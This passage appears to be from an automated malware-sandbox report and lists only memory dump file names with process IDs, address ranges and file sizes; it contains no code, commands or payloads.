-
memory/3848-147-0x0000000000000000-mapping.dmp
-
memory/4036-217-0x0000000000000000-mapping.dmp
-
memory/4052-202-0x0000000000000000-mapping.dmp
-
memory/4076-174-0x0000000000000000-mapping.dmp
-
memory/4180-218-0x0000000000000000-mapping.dmp
-
memory/4188-212-0x0000000000000000-mapping.dmp
-
memory/4260-227-0x00007FF8F9830000-0x00007FF8FA2F1000-memory.dmpFilesize
10.8MB
-
memory/4260-197-0x00007FF8F9830000-0x00007FF8FA2F1000-memory.dmpFilesize
10.8MB
-
memory/4260-196-0x00000145A6FA0000-0x00000145A6FA7000-memory.dmpFilesize
28KB
-
memory/4300-170-0x0000000000000000-mapping.dmp
-
memory/4324-166-0x0000000000000000-mapping.dmp
-
memory/4460-158-0x0000000000000000-mapping.dmp
-
memory/4464-225-0x0000000000000000-mapping.dmp
-
memory/4500-144-0x0000000000000000-mapping.dmp
-
memory/4500-160-0x00007FF8F8AD0000-0x00007FF8F9591000-memory.dmpFilesize
10.8MB
-
memory/4500-156-0x00007FF8F8AD0000-0x00007FF8F9591000-memory.dmpFilesize
10.8MB
-
memory/4572-172-0x0000000000000000-mapping.dmp
-
memory/4628-171-0x00007FF8F93D0000-0x00007FF8F9E91000-memory.dmpFilesize
10.8MB
-
memory/4628-176-0x00007FF8F93D0000-0x00007FF8F9E91000-memory.dmpFilesize
10.8MB
-
memory/4656-137-0x0000000000000000-mapping.dmp
-
memory/4680-178-0x0000000000000000-mapping.dmp
-
memory/4680-188-0x00000212B3C00000-0x00000212B3C08000-memory.dmpFilesize
32KB
-
memory/4680-184-0x00000212B3BE0000-0x00000212B3BEA000-memory.dmpFilesize
40KB
-
memory/4680-183-0x00000212B3BC0000-0x00000212B3BDC000-memory.dmpFilesize
112KB
-
memory/4680-182-0x00007FF8F9830000-0x00007FF8FA2F1000-memory.dmpFilesize
10.8MB
-
memory/4680-185-0x00000212B3C10000-0x00000212B3C2C000-memory.dmpFilesize
112KB
-
memory/4680-189-0x00000212B6D30000-0x00000212B6D36000-memory.dmpFilesize
24KB
-
memory/4680-187-0x00000212B6D50000-0x00000212B6D6A000-memory.dmpFilesize
104KB
-
memory/4680-190-0x00000212B6D40000-0x00000212B6D4A000-memory.dmpFilesize
40KB
-
memory/4680-191-0x00007FF8F9830000-0x00007FF8FA2F1000-memory.dmpFilesize
10.8MB
-
memory/4680-186-0x00000212B3BF0000-0x00000212B3BFA000-memory.dmpFilesize
40KB
-
memory/4708-216-0x0000000000000000-mapping.dmp
-
memory/4740-161-0x0000000000000000-mapping.dmp
-
memory/4764-222-0x0000000000000000-mapping.dmp
-
memory/4764-150-0x0000000000000000-mapping.dmp
-
memory/4804-209-0x0000000000000000-mapping.dmp
-
memory/4808-164-0x0000000000000000-mapping.dmp
-
memory/4888-135-0x00007FF8F8AD0000-0x00007FF8F9591000-memory.dmpFilesize
10.8MB
-
memory/4888-134-0x000002C318020000-0x000002C318270000-memory.dmpFilesize
2.3MB
-
memory/4888-163-0x00007FF8F8AD0000-0x00007FF8F9591000-memory.dmpFilesize
10.8MB
-
memory/5004-139-0x0000000000000000-mapping.dmp
-
memory/5004-206-0x0000000000000000-mapping.dmp
-
memory/5116-220-0x0000000000000000-mapping.dmp
-
memory/5116-149-0x0000000000000000-mapping.dmp